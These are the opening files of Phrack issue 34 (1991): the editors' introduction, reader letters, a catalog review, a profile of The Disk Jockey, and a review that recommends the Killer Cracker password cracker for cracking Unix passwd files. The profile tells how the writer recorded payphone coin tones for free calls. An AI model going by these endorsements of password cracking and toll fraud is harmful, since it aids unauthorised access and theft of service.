3211 lines
151 KiB
Plaintext
3211 lines
151 KiB
Plaintext
![]() |
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-four, File #1 of 11
|
|||
|
|
|||
|
Issue XXXIV Index
|
|||
|
__________________
|
|||
|
|
|||
|
P H R A C K 3 4
|
|||
|
|
|||
|
October 13, 1991
|
|||
|
__________________
|
|||
|
|
|||
|
~Technology for Survival~
|
|||
|
|
|||
|
|
|||
|
Welcome back to Phrack Inc. From now on, the editorship will consist of
|
|||
|
Crimson Death and Dispater. We have decided to join both our forces and pool
|
|||
|
our assets to make Phrack even better. We will have accounts at various
|
|||
|
Internet sites, however, all file submitions should be mailed to
|
|||
|
phracksub@stormking.com. If you do not have access to the Internet give Free
|
|||
|
Speech BBS a call. Crimson Death will take it from there.
|
|||
|
|
|||
|
Special thanks this month goes out to Night Ranger for being great help!
|
|||
|
Also thanks to Inhuman and Laughing Gas for taking the time to submit
|
|||
|
material.
|
|||
|
|
|||
|
Phrack has never really had a distrabution BBS, but you can always get it
|
|||
|
on the Internet at EFF.ORG or CS.WIDENER.COM. Off the Internet, the BBS
|
|||
|
distribution will be from Free Speech BBS. Below are a list of a few other
|
|||
|
boards that carry all the Phracks.
|
|||
|
|
|||
|
Free Speech BBS (618) 549-4955
|
|||
|
Blitzkreig BBS (502) 499-8933
|
|||
|
Digital Underground (812) 941-9427
|
|||
|
Pyrotechnic's Pit (407) 254-3655
|
|||
|
|
|||
|
We would also like to thank the nameless numbers of BBS's out there that
|
|||
|
carry Phrack Inc. without their names being listed here!
|
|||
|
|
|||
|
In this issue of Phrack Inc. we are starting a "letters to the editor"
|
|||
|
section called "Phrack Loopback." Any questions, comments, corrections, or
|
|||
|
problems that you the reader would like to air with Phrack publically will be
|
|||
|
answered there. Loopback will also contain information such as reviews of
|
|||
|
other magazines, catalogs, hardware, and softare. With Loopback we hope to
|
|||
|
make Phrack Inc. more interactive with our readers.
|
|||
|
|
|||
|
This month we had an oportunity to interview one of our "hacker hero's",
|
|||
|
The Disk Jockey. We are also trying to "liven up" Phrack World News a little
|
|||
|
by adding some editor's comments about recent news topics. If we get a
|
|||
|
positive response, we will continue doing this. Hopefully you will respond
|
|||
|
with your views as well.
|
|||
|
|
|||
|
Your Editors,
|
|||
|
|
|||
|
Crimson Death Dispater
|
|||
|
cdeath@stormking.com phracksub@stormking.com
|
|||
|
===============================================================================
|
|||
|
COMMENTS INSERTED BY SERVER:
|
|||
|
|
|||
|
As the server of the Phrack Mailing List, I'd like to get a few
|
|||
|
words in. First, since I am currently a VERY DUMB list server, I am currently
|
|||
|
not very interactive. I am working with the system administrators and owners
|
|||
|
to get an interactive "LISTSERV" onto this machine. I would also like to know
|
|||
|
if anyone can get me access to an IP address via SLIP at an Internet site
|
|||
|
VERY CLOSE to the Newburgh/Poughkeepsie, NY area. Another thing I could use
|
|||
|
is a Phrack SubBot for IRC. Something small that would allow you to get
|
|||
|
information on the release date of the next Phrack, add your name to the
|
|||
|
Mailing List, find out the Index of the last issue and such. I can handle
|
|||
|
awk, perl and 'C'. An IRC connection (Not the server software) would also
|
|||
|
be interesting. Another thing I heard of and am interested in is something
|
|||
|
that might start a seperate list. There is a game, where you write a program
|
|||
|
to make a robot to fight another programmed robot. You run these against
|
|||
|
each other to see who will win. You can then modify the code to try again.
|
|||
|
It needs to be compatible with an IBM Risc/6000 running AIX 3.1.5 running
|
|||
|
patch #2006. Help is also needed with SENDMAIL.CF configuration and etc.
|
|||
|
Basically, if you have something that the SERVER might be interested in,
|
|||
|
please mail "server@stormking.com". Also, if someone mentions that they are
|
|||
|
not receiving a copy when they asked to subscribe, anything that DOES bounce
|
|||
|
back here is automatically deleted. For example, if something comes back
|
|||
|
from SUSY.THUNDER@POKER.LASVEGAS.NV.CA (Susan Lynn Headley) and I am told
|
|||
|
that POKER.LASVEGAS.NV.CA is not connected to CYBERPUNK.HAFNER.MARKOFF.NY.NY
|
|||
|
I will NOT attempt to resolve the message.
|
|||
|
|
|||
|
Storm King List Server
|
|||
|
===============================================================================
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
Phrack XXXIV Table of Contents
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
1. Introduction to Phrack 34 by Crimson Death & Dispater
|
|||
|
2. Phrack Loopback by The Phrack Staff
|
|||
|
3. Phrack Prophile of The Disk Jockey by The Disk Jockey & Dispater
|
|||
|
4. The AT&T Mail Gateway by Robert Alien
|
|||
|
5. The Complete Guide to Hacking WWIV by Inhuman
|
|||
|
6. Hacking Voice Mail Systems by Night Ranger
|
|||
|
7. An Introduction to MILNET by Brigadier General Swipe
|
|||
|
8. TCP/IP: A Tutorial Part 2 of 2 by The Not
|
|||
|
9. Advanced Modem-Oriented BBS Security by Laughing Gas & Dead Cow
|
|||
|
10. PWN/Part01 by Dispater
|
|||
|
11. PWN/Part02 by Dispater
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-four, File #2 of 11
|
|||
|
|
|||
|
^[-=:< Phrack Loopback >:=-]^
|
|||
|
|
|||
|
By: The Phrack Staff
|
|||
|
|
|||
|
Phrack Loopback is a forum for you, the reader, to ask questions, air
|
|||
|
problems, and talk about what ever topic you would like to discuss. This is
|
|||
|
also the place The Phrack Staff will make suggestions to you by reviewing
|
|||
|
various items of note; magazines, software, catalogs, hardware, etc.
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
What's on Your Mind
|
|||
|
~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
>Date: Fri, 20 Sep 91 01:22:30 -0400
|
|||
|
>To: phracksub@stormking.com
|
|||
|
>
|
|||
|
>So what exactly DID happen to Agent Steal? There was a small blurb in
|
|||
|
>PWN for 33, but gave no details. Why was he arrested, what was confiscated,
|
|||
|
>and how long will he probably be away for.
|
|||
|
>
|
|||
|
>Mind you, this is a tragic loss, since Agent Steal was a gifted hacker and
|
|||
|
>had a whole lotta balls to boot.
|
|||
|
>
|
|||
|
> Sincerely,
|
|||
|
>
|
|||
|
> A concerned reader
|
|||
|
|
|||
|
To be honest, it would not in his best interest to say much about his
|
|||
|
case before his trial. What we have written comes from a very reliable source.
|
|||
|
Some people close to him are denying everything. This is most likely to keep
|
|||
|
from happening to him what happened to people like Mind Rape, who have basically
|
|||
|
been "convicted" by the media.
|
|||
|
|
|||
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|||
|
|
|||
|
>From: Drahgon
|
|||
|
>Date: Thu Sep 26 06:00:35 1991
|
|||
|
>
|
|||
|
> Dear Dispater,
|
|||
|
>
|
|||
|
> My name is Drahgon unless, of course. I have several things to blow
|
|||
|
> from my mind here....
|
|||
|
>
|
|||
|
> How is the progress of Phrack 33? I am not really up on all the
|
|||
|
> hoopla surrounding it, but I am curious. In high school I often
|
|||
|
> published "underground newsletters" about the manufacture of drugs and
|
|||
|
> explosives, etc. The computer underground is a new territory for me
|
|||
|
> and I have just begun. I would love to hear about your mag....I would
|
|||
|
> perhaps have something to offer.
|
|||
|
|
|||
|
We at Phrack Inc. are here to publish any kind of information you the
|
|||
|
reader are interested in. We, unlike many other people out there, will not
|
|||
|
judge you and can call you a "lamer" if you submit something to us that we
|
|||
|
might think is a little elementary. We might not necessarily run it in Phrack,
|
|||
|
but we aren't the kind of people that are going to call you up in the middle
|
|||
|
of the night on an Alliance Teleconference and harass you. In fact, there are
|
|||
|
many text files out there that are out-dated and need to be corrected!
|
|||
|
Simply put, if you are interested in it, there are probably two hundred others
|
|||
|
out that are afraid to ask, because some El1Te person will call them
|
|||
|
"stupid." Here at Phrack Inc., WE ARE NOT El1Te, WE ARE JUST COOL AS HELL!
|
|||
|
We want to help everyone in their quest for knowledge.
|
|||
|
|
|||
|
> Secondly, I want to start my own bbs up here in my town. This
|
|||
|
> town is dead, but there is still a glint of life, it needs to be
|
|||
|
> kindled. There are currently no BBS's up here that carry information
|
|||
|
> of an "alternative nature", and there is in fact laws that prevent
|
|||
|
> them from springing up. (whatever happened to freedom of the press?),
|
|||
|
> Well, anyway, I would like to know if you would support a BBS of
|
|||
|
> mine, and maybe you could give me some pointers...
|
|||
|
>
|
|||
|
> Thanx ALOT
|
|||
|
> DRAHGON
|
|||
|
|
|||
|
That's great! We're always glad to see new faces that are truly interested
|
|||
|
in helping people by becoming a source of information. If you
|
|||
|
have any questions about BBS's you should ask the expert, Crimson Death. He
|
|||
|
will be more than happy to help you out.
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
Corrections
|
|||
|
~~~~~~~~~~
|
|||
|
In V.3, I#33, File 9 of 13, there was a error. R5 Should have been a
|
|||
|
10K pot and not just a resistor. The corrected part of the schematic
|
|||
|
should look like this:
|
|||
|
_
|
|||
|
+9__S1/ _____________________________________________________________
|
|||
|
| | | | | S3 |
|
|||
|
R1 R2 | R3 o @ o |
|
|||
|
|___C1___| _____| |_________|/___ / o \___ |
|
|||
|
| ____|_____|_____|____ | | |\ | | _| |
|
|||
|
_| o | 6 4 14 | R4 |__ D1 | | R9< |
|
|||
|
S2 | o _|5 13|_____| _| | |__ | |
|
|||
|
| | | | |__ R5< | _| | |
|
|||
|
g |_|10 IC1 8|_ _| | | R8< | |
|
|||
|
| 556 | |__R6< g |__ | | |
|
|||
|
_|9 12|_| _| | | |
|
|||
|
| | | |__C2__g R7< | | |
|
|||
|
| |_11___3___7___2___1__| | | | |
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
Hardware Catalog Review
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Twisted Pair
|
|||
|
|
|||
|
You can never get enough catalogs. One reason is because you never know what
|
|||
|
off-the-wall parts you'll be needing. From time to time I'll be reviewing
|
|||
|
catalogs so you'll be able to learn where to get the really good stuff as far
|
|||
|
as computer equipment, telco test equipment, and IC chips are concerned. In
|
|||
|
this issue, we study two of them...
|
|||
|
|
|||
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|||
|
|
|||
|
SYNTRONICS
|
|||
|
2143 Guaranty Drive
|
|||
|
Nashville, Tennessee 37214
|
|||
|
(615) 885-5200
|
|||
|
|
|||
|
I recently saw an issue of "Nuts and Volts" magazine which had a Syntronics ad
|
|||
|
in it. I sent the dollar they wanted for a catalog. Apparently, demand for
|
|||
|
the catalogs was so great that they're having some more printed up. They sent
|
|||
|
my dollar back with an explanation and a partial photocopy of the catalog.
|
|||
|
An associate on the left coast and I want to build a tone decoder and have been
|
|||
|
looking for a particular chip for a long time. We found it in this catalog.
|
|||
|
It's an SSI-202 Tone Decoder IC for $12. Not bad for a chip I was unable to
|
|||
|
locate in about 30 catalogs I've searched through. A fellow phreak was told by
|
|||
|
a zit-faced Radio Shack employee over their 800 number, "They had only 3 left
|
|||
|
and they would cost $100 each." I don't think so.
|
|||
|
|
|||
|
Syntronics is selling plans for an interesting device you hook up to the phone
|
|||
|
line. With it you can call it and turn on any one of three 110VAC outlets.
|
|||
|
To turn them on you use simple DTMF commands. This would be useful for
|
|||
|
turning on your computer, modem, room bug, security lights, etc from a remote
|
|||
|
location. Plans for this device cost $9 and you'd need the above-mentioned IC
|
|||
|
chip to build it with.
|
|||
|
|
|||
|
Syntronics carries:
|
|||
|
-------------------
|
|||
|
Project Plans Software Unusual Hardware Kits IC's Transistors
|
|||
|
|
|||
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|||
|
|
|||
|
Telephone International (The marketplace for
|
|||
|
PO BOX 3589 communications equipment,
|
|||
|
Crossville, Tennessee 38557 services, and employment)
|
|||
|
(615) 484-3685
|
|||
|
|
|||
|
This is a monthly publication you can receive free. It's usually about 30 pages
|
|||
|
printed on large yellow-pages paper. To save yourself the $50 a year
|
|||
|
first-class yearly subscription rate, just tell them you're a telephone
|
|||
|
technician. Tell them you need to often buy PBX's, Terminal Blocks, etc.
|
|||
|
They'll send it to you free, because you're special!
|
|||
|
|
|||
|
Here's a sampling of stuff you can find in there:
|
|||
|
-------------------------------------------------
|
|||
|
A Complete Digital Switching System with 3200 lines on a flatbed trailer !!!!!!
|
|||
|
Repaired Payphones Optical Fiber xmission system
|
|||
|
Operator's Headsets CO Digital multiplexers
|
|||
|
AT&T teletypes Used FAX machines
|
|||
|
AT&T Chevy bucket trucks Hookswitches
|
|||
|
|
|||
|
Digital error message announcers Central Office Coin System Processor Cards
|
|||
|
|
|||
|
Telephone International lists a bunch of telco seminars happening around the
|
|||
|
country on their "Calendar of Events" page. They also list conferences for
|
|||
|
security organizations including dates and phone numbers you'd need to register.
|
|||
|
|
|||
|
That's it for this edition of Hardware Hacking. Keep an eye out for good
|
|||
|
suppliers to the Phreak world. Pass'em along to Phrack.
|
|||
|
|
|||
|
-T_W-I_S-T_E-D_
|
|||
|
-P_A-I_R-
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
A Review of the Killer Cracker V.7.0
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by The Legion of d0oDez
|
|||
|
|
|||
|
As every hacker worth his/her salt knows, the Unix operating system has major
|
|||
|
security problems when it comes to it's passwd file. Although this may be
|
|||
|
good as some people think information should not be hoarded, others think
|
|||
|
information should be kept to be people who can use it best, the one's with
|
|||
|
the most money. The passwd file is the Unix file that stores the user
|
|||
|
information which included username, home directory, and passwords among
|
|||
|
others. I will not go into the basics of Unix as this is not a Unix
|
|||
|
how-to hack file. It is a review of Killer Cracker 7.0 (aka KC7.)
|
|||
|
|
|||
|
KC7 is a Unix password hacker that is portable to most machines. It is
|
|||
|
written by Doctor Dissector and is free software as the terms of the GNU
|
|||
|
General Public License (By the Free Software Foundation <address at end of
|
|||
|
file>) states. The version 7.0 is not the latest version but seems to be
|
|||
|
the best to use. It is dated as 6/1/91 which makes it pretty recent. 8.0
|
|||
|
is rumored to be out but we have not had the opportunity to review it yet as
|
|||
|
we are still testing it. ;-)
|
|||
|
|
|||
|
The best thing about KC7 is that you can run it on most machines that will
|
|||
|
run C programs which happens to include MS-DOS machines. With this in
|
|||
|
mind, you can now let your PC do the work of hacking passwords in the privacy
|
|||
|
of your own home without having to use a mainframe which might be a bit
|
|||
|
risky. The distribution copy of KC7 comes with the following files:
|
|||
|
|
|||
|
KC.EXE -- MS-DOS executable
|
|||
|
KC.DOC -- Documents
|
|||
|
Source.DOC -- The source code to KC
|
|||
|
KC.C -- The Turbo C source code
|
|||
|
|
|||
|
And other files that pertain to DES and word files.
|
|||
|
|
|||
|
KC7 works by taking an ascii file composed of words and encrypting them so
|
|||
|
that it can compare the encrypted words with the passwords in the PASSWD file.
|
|||
|
It is pretty efficient but if running on an MS-DOS system, you will probably
|
|||
|
want to use a machine that is at least a 286-12 or higher. The time to
|
|||
|
complete a PASSWD file is directly proportional to how large the file is
|
|||
|
(max size of PASSWD must be less than 64K on an MS-DOS machine) and what
|
|||
|
speed of machine you are using. There are options which allow you to take
|
|||
|
words (aka guesses) from other sources as well as a words file. These
|
|||
|
sources can be words from the PASSWD file such as the username, single
|
|||
|
characters, and straight ascii characters such as DEL or ^D. It can also
|
|||
|
manipulate the guesses in various ways which might be helpful in guessing
|
|||
|
passwords.
|
|||
|
|
|||
|
Another useful option is the RESTORE function. KC7 has the ability to
|
|||
|
allow the user to abort a crack session and then resume cracking at a
|
|||
|
later date. This is very nice since one does not always have the time
|
|||
|
nor patience to crack a 50k passwd file without wanting to use his/her
|
|||
|
machine for other uses such as trying out new passwords.
|
|||
|
|
|||
|
We have found that the best way, as suggested by the author, to crack is by
|
|||
|
using the default method which is to crack by word and not by username.
|
|||
|
You will understand when you get a hold of the software.
|
|||
|
|
|||
|
You can get KC7 at most H/P oriented bbs's as everyone thinks he/she is
|
|||
|
a Unix wizard nowadays.
|
|||
|
|
|||
|
Overall, KC7 is an excellent program and we suggest it to all Unix hackers.
|
|||
|
We also hope you have enjoyed this file and we look forward to bringing
|
|||
|
more interesting reading to your terminal. Until then.... Happy hacking.
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-Four, File #3 of 11
|
|||
|
|
|||
|
-*[ P H R A C K XXXIV P R O P H I L E ]*-
|
|||
|
|
|||
|
-=>[ Presented by Dispater ]<=-
|
|||
|
|
|||
|
The Disk Jockey
|
|||
|
~~~~~~~~~~~~~~~
|
|||
|
Handle: The Disk Jockey (over 10 years now...)
|
|||
|
Call him: Doug
|
|||
|
Reach him: douglas@netcom.com
|
|||
|
Past handles: None
|
|||
|
Handle origin: Selected it way back in the Apple days, when
|
|||
|
it was hip to have a hardware-related name.
|
|||
|
Date of Birth: 12/29/67
|
|||
|
Age at current date: 23
|
|||
|
Approximate Location: Silicon Valley
|
|||
|
Height: 6'1"
|
|||
|
Weight: 220 lbs.
|
|||
|
Eye color: Green
|
|||
|
Hair Color: Blond/brown
|
|||
|
Education: Cornell, Univ of Michigan, Stanford, and a
|
|||
|
slew of others schools that I had the
|
|||
|
opportunity to attend. What started out as
|
|||
|
a strong belief in law became so jaded that
|
|||
|
I fell back on Comp Sci. Still wake up in
|
|||
|
the middle of the night yelling "NO!, NO!"
|
|||
|
Also have a wallpaper degree in Psychology.
|
|||
|
Computers: First: Apple //. Presently: several. Mac
|
|||
|
IIfx, 386/33, and several others that I can't
|
|||
|
seem to get rid of...
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
The Story of my Hacking Career
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
I was lucky enough to be able to get my hands on computers early, back in
|
|||
|
the days of the PET and the TRS-80. Although we poke fun at a Trash-80 now, at
|
|||
|
the time I was completely fascinated by it. Remember Newdos/80, LDOS, and
|
|||
|
utilities like SuperZap?
|
|||
|
|
|||
|
Things started really rolling after a friend introduced me to the Apple.
|
|||
|
Although I never fell into the stereotype of being a computer "nerd" (don't we
|
|||
|
all like to think that?), compared to the redundancy of normal schoolwork,
|
|||
|
learning about the Apple was a new and unexplored world. Unlike most of the
|
|||
|
other computer "types", I didn't read science fiction, didn't have any social
|
|||
|
problems, and thought looking at girls was more enjoyable than talking about
|
|||
|
hardware. Well, depending on the hardware. (ha-ha!)
|
|||
|
|
|||
|
"Cracking" Apple software was of course the next logical step. The 6502
|
|||
|
was a wonderful chip, and easy to learn. Copy-cards and other "hacked"
|
|||
|
hardware was becoming findable and it was getting to the point that the
|
|||
|
only goal was to get your hands on pre-release software. Before I had entered
|
|||
|
the "modem" world, friends had a network of other people across the country and
|
|||
|
traded things by mail.
|
|||
|
|
|||
|
Of course the whole world changed when I picked up a 300 baud modem.
|
|||
|
Suddenly there was the communication and knowledge that I had been hungry for.
|
|||
|
People wrote text files on just about everything imaginable. What is the
|
|||
|
president's phone number? How can I call the pope? How can I make lowercase
|
|||
|
on my Apple II? What are the routing numbers for boxing to the Eastern Bloc
|
|||
|
countries?
|
|||
|
|
|||
|
Codes were never much of an interest. The systems that ran them, however,
|
|||
|
were quite interesting. As technology advanced, SCCs started using
|
|||
|
sophisticated AI techniques to detect any kind of abnormal usage instantly.
|
|||
|
Codes used to last several months, now they only lasted a few hours. Boxing,
|
|||
|
however, was a little more elegant and was the flashy way to call your friends.
|
|||
|
|
|||
|
Even before I had ever heard of boxing or phreaking, I enjoyed the
|
|||
|
benefits of what we now know as a "red box". While in boarding school, I
|
|||
|
noticed that a somewhat broken phone emitted obscenely loud "beeps" when you
|
|||
|
dropped in a quarter. I took a little micro-recorder and recorded myself
|
|||
|
dropping about $5.00 into the phone. When I played this back into the
|
|||
|
telephone, the telco thought I was actually dropping change in the machine! I
|
|||
|
was able to call my girlfriend or whomever and speak for hours. Now most
|
|||
|
payphones mute those tones so they are barely audible, if at all.
|
|||
|
|
|||
|
Local user groups were a good place to pick up software, legal and
|
|||
|
otherwise. Remember those damn "CLOAD" magazine tapes for the TRS-80? 80-Micro
|
|||
|
magazine? The early 80's was the time of the hardware hacker - anything
|
|||
|
bizarre you wanted you had to make yourself, since it wasn't available
|
|||
|
otherwise. Now you can call any of a slew of 800 numbers, give them your
|
|||
|
credit card number (!) and have it on your doorstep the next day.
|
|||
|
|
|||
|
I think part of the problem of the "new generation" of hackers, phreakers,
|
|||
|
warez kids, etc, is that they never had the experience with low-level stuff and
|
|||
|
actually having to into the hardware to get what they wanted. Their only
|
|||
|
programming experience is coming from school, which gives a shallow and usually
|
|||
|
totally impractical background for the "real world".
|
|||
|
|
|||
|
My eventual disgust with the pirate world came when products such as
|
|||
|
"Pirate's Friend" came out, allowing people to sector edit out my name and
|
|||
|
insert theirs. I had spent quite a lot of time trying to find new software,
|
|||
|
and enjoyed the ego stroke of having my name passed around. I had a lot of
|
|||
|
respect for book authors that were plagiarized after that...
|
|||
|
|
|||
|
About the industry
|
|||
|
~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
The computer industry in general is interesting. Working in it, I hope
|
|||
|
I'm justified to speak about it. Getting a job is quite easy, since the
|
|||
|
technology is changing so much, unless it is in something that will be around
|
|||
|
for some time, you can usually pick up a job by just knowing the latest
|
|||
|
developments, the buzzwords, and having good "chemistry". In the valley many
|
|||
|
firms realize that colleges don't really teach you much in the way of practical
|
|||
|
knowledge. At best, they give you the opportunity to try different types of
|
|||
|
machines. It amazes me that HR departments in companies across the country
|
|||
|
won't even look at a resume unless the applicant has a college degree.
|
|||
|
Advanced degrees are a different matter and are usually quite applicable
|
|||
|
towards research, but your usual BA/BS variety? Nah. If you want to make a
|
|||
|
lot of money in this industry, all you need to do is get the reputation as a
|
|||
|
person who "gets things done" and have superior communication skills. You can
|
|||
|
write your ticket after that.
|
|||
|
|
|||
|
About legal issues
|
|||
|
~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Anyone who has ever read some of my later text files (1986, 1987) knows
|
|||
|
that I had no qualms about the legalities of beating an establishment.
|
|||
|
Although my line of morals was probably beyond where others placed theirs, I
|
|||
|
could always justify to myself damage or loss to an establishment, "beating the
|
|||
|
system", rather than hurting the individual. Although I am pretty right-winged
|
|||
|
in beliefs, I have a great distrust for the policing agencies.
|
|||
|
|
|||
|
Various memories
|
|||
|
~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Getting a call from my father while at school and being told that Control
|
|||
|
C had called him and relayed the message "Tell Doug the FBI are after The Disk
|
|||
|
Jockey. Get rid of everything and hide." To say I "cleaned house" would have
|
|||
|
been a gross understatement. I knew this was true, I, like many others, had
|
|||
|
just ridden on the false pretense that they would have better things to do then
|
|||
|
come after me. I later saw intelligence reports showing that I had been kept
|
|||
|
track of for some time. I was described as:
|
|||
|
|
|||
|
"Involved in some type of student-loan scam through creating fictitious college
|
|||
|
applicants at his school. Very violent temper, ruthless attitude. Breaks
|
|||
|
people's legs for money (TX). Owns a motorcycle and a european sedan. Nasty
|
|||
|
hacker."
|
|||
|
|
|||
|
Only a handful of people would know that I had a motorcycle, so it was
|
|||
|
somewhat upsetting that they had this kind of information on me. I later saw
|
|||
|
some of this same information in Michigan Bell Security's records. They also
|
|||
|
had the correct phone number for my place at Cornell, my parents number, and
|
|||
|
even the number of some of my personal non-computer related friends.
|
|||
|
|
|||
|
SummerCon in 1987 was a fun experience. I had the opportunity to meet
|
|||
|
many of the people that I communicated with regularly, as well as wonder why
|
|||
|
people thought St. Louis was such a wonderful place. While there were a few
|
|||
|
socially "on-the-fringe" types, I was amazed that most of the other "hackers"
|
|||
|
didn't fit the usual stereotypes. They were just regular guys that had a some
|
|||
|
above average cleverness that allowed them to see the things that others
|
|||
|
couldn't.
|
|||
|
|
|||
|
By the time I was 20 years old, I had about $40,000 worth of credit on
|
|||
|
plastic, as well as a $10,000 line of credit for "signature loans" at a local
|
|||
|
bank. The credit system was something that seemed fun to exploit, and it
|
|||
|
doesn't take long to figure out how the "system" works. With that kind of cash
|
|||
|
Aavailable, however, it's tempting to go and buy something outrageous and do
|
|||
|
things that you wouldn't normally do if you had the cash. This country is
|
|||
|
really starting to revolve around credit, and it will be very hard to survive
|
|||
|
if you don't have some form of it. If more people were aware of how the credit
|
|||
|
systems worked, they might be able to present themselves in a better light to
|
|||
|
future creditors. I don't think that credit is a difficult thing to
|
|||
|
understand, I just had an unusual interest in understanding and defeating it.
|
|||
|
Perhaps this is something that my future text files should be about.
|
|||
|
|
|||
|
Getting busted
|
|||
|
~~~~~~~~~~~~~
|
|||
|
|
|||
|
On June 27, 1988 at 1:47am, I had just parked my car outside my apartment
|
|||
|
and was walking up to the door when I heard someone say "Doug?" I knew that no
|
|||
|
friend of mine would be visiting at that hour, so I knew my fate before I
|
|||
|
turned around. An FBI agent, State police detective and a local detective were
|
|||
|
walking up to me. "We have a warrant for your arrest." Interestingly, they had
|
|||
|
actually several warrants, since they weren't sure what my name was. I was
|
|||
|
being arrested for 6 counts of "conspiracy to commit fraud". After being
|
|||
|
searched to make sure I wasn't carrying a gun, they asked if they could "go
|
|||
|
into my apartment and talk about things". Although I had completely "cleaned
|
|||
|
house" and had nothing to hide in there, I wasn't about to help out an
|
|||
|
investigation on me. "Ah, I think I had better contact an attorney first."
|
|||
|
"Is there one you can call right now?" "Are you kidding? It's 2:00am!"
|
|||
|
|
|||
|
I was handcuffed and had my legs strapped together with a belt and was
|
|||
|
thrown in the back of a car. This was one of those usual government cars that
|
|||
|
you see in the movies with the blackwalls and usual hubcaps. Interestingly
|
|||
|
enough, the armrest of the car hid quite an array of radio equipment. Although
|
|||
|
pretty freaked out, I figured the best thing to do at that point was try to get
|
|||
|
some sleep and call the best attorney money could by in the morning.
|
|||
|
|
|||
|
Little did I know where I was being brought. I was driven all the way to
|
|||
|
a small Indiana town (population 5,000) where a 16 year-old Wheatfield Indiana
|
|||
|
boy had made the statement that he and I "agreed to devise a scam". Although
|
|||
|
nothing was ever done, merely planning it created the conspiracy charge.
|
|||
|
|
|||
|
I figured that after my arraignment I could post bail and find an
|
|||
|
attorney. I had almost $10k in the bank and could probably find more if I
|
|||
|
needed it. I was sadly mistaken. The next day at my arraignment the charges
|
|||
|
were read and bail was set -- $150,000.00, cash only!
|
|||
|
|
|||
|
In a strange turn of events, the FBI decided to totally drop the case
|
|||
|
against me. The federal prosecutor figured it wasn't worth wasting his time
|
|||
|
and they jumped out. However, the Indiana state police were involved in my
|
|||
|
arrest and were angry that the FBI was dropping the case after they had
|
|||
|
invested so much time and money in the case, so they decided to pursue the case
|
|||
|
themselves. There is so much friction between the FBI and state police, that
|
|||
|
the FBI didn't even answer their letters when they tried to request information
|
|||
|
and data files on me.
|
|||
|
|
|||
|
Funny. I spent 6 months in a tiny county jail, missing the start and
|
|||
|
first semester of school. I was interrogated constantly. I never told on a
|
|||
|
sole and never made a statement about myself. I sat in jail daily, reading
|
|||
|
books and waiting for my court dates. Although I never expected it, nobody
|
|||
|
ever thanks you when you keep your mouth shut. I can't imagine that many
|
|||
|
people would sit in jail for a long time in order to save their friends.
|
|||
|
Perhaps it's a personal thing, but I always thought that although I doubt
|
|||
|
someone else would do it for me, I would never, ever tell anything on anyone
|
|||
|
else. I would never be responsible for someone else's demise. It took a lot
|
|||
|
of money, and a lot of friday nights of frustration, but I walked away from
|
|||
|
that incident without ever making a statement. It was at a time when my
|
|||
|
"roots" were deepest and I probably could have really turned in a lot of other
|
|||
|
people for my benefit, but it was at a time in my life where I could afford to
|
|||
|
miss some school and the integrity was more important to me. There were a lot
|
|||
|
of decisions that had to be made, and spending time in jail is nothing to be
|
|||
|
proud of, but I never backed down or gave in. It did provide the time for me
|
|||
|
to really re-evaluate who and what I was, and where I was going.
|
|||
|
|
|||
|
People I've known
|
|||
|
~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Compaq Personal friend for some time now.
|
|||
|
Control C Mostly likely the craziest guy I've ever met.
|
|||
|
Really nice guy.
|
|||
|
Knight Lightning Would call me up in the middle of the night and
|
|||
|
want to discuss philosophical and social issues.
|
|||
|
Kind of guy I would probably get along with outside
|
|||
|
of computers as well.
|
|||
|
Loki Friend since high school. Made a big splash in the
|
|||
|
h/p world, then disappeared from it. He and I (and
|
|||
|
Control C) drove to SummerCon together.
|
|||
|
Shooting Shark Great guy who used to be into calling bridges
|
|||
|
and would yell "Hey, I'm paying for this!" Truly
|
|||
|
one of the only people that I ever knew that didn't
|
|||
|
do anything blatantly illegal. Most of our email
|
|||
|
was over the optimization of crypt. The Mad Alchemist
|
|||
|
Sysop of Lunatic Labs, one of the only boards that
|
|||
|
I feel is worth the telephone call anymore.
|
|||
|
He has given me a lot of slack and runs
|
|||
|
a BBS that picks up some of the most obscure
|
|||
|
information. A sysop that others should be judged
|
|||
|
by.
|
|||
|
Tom Brokaw Personal friend since childhood that stood by me
|
|||
|
through thick and thin, bailing me out of trouble
|
|||
|
time and time again. I can never thank him enough
|
|||
|
for being a true friend.
|
|||
|
|
|||
|
BBSs
|
|||
|
~~~
|
|||
|
More than I could mention here. A few more recent notables --
|
|||
|
|
|||
|
Atlantis Although run on an Apple, the Lineman had this
|
|||
|
system so slick and customized that it became the
|
|||
|
standard that a lot of the PC based boards were
|
|||
|
created with. It was the first real
|
|||
|
"clearinghouse" for text files.
|
|||
|
Free World II Run by Major Havoc and myself, this was an
|
|||
|
incredibly robust system, and was one of the first
|
|||
|
to be run on a US Robotics HST. Although it was
|
|||
|
primarily a discussion board, the file areas
|
|||
|
offered some of the best files -- virtually no
|
|||
|
games, but about every real utility and the like.
|
|||
|
|
|||
|
Metal AE 201-879-6668 - this was a true blue AE line that
|
|||
|
was around for like 5 or 6 years and was ALWAYS busy.
|
|||
|
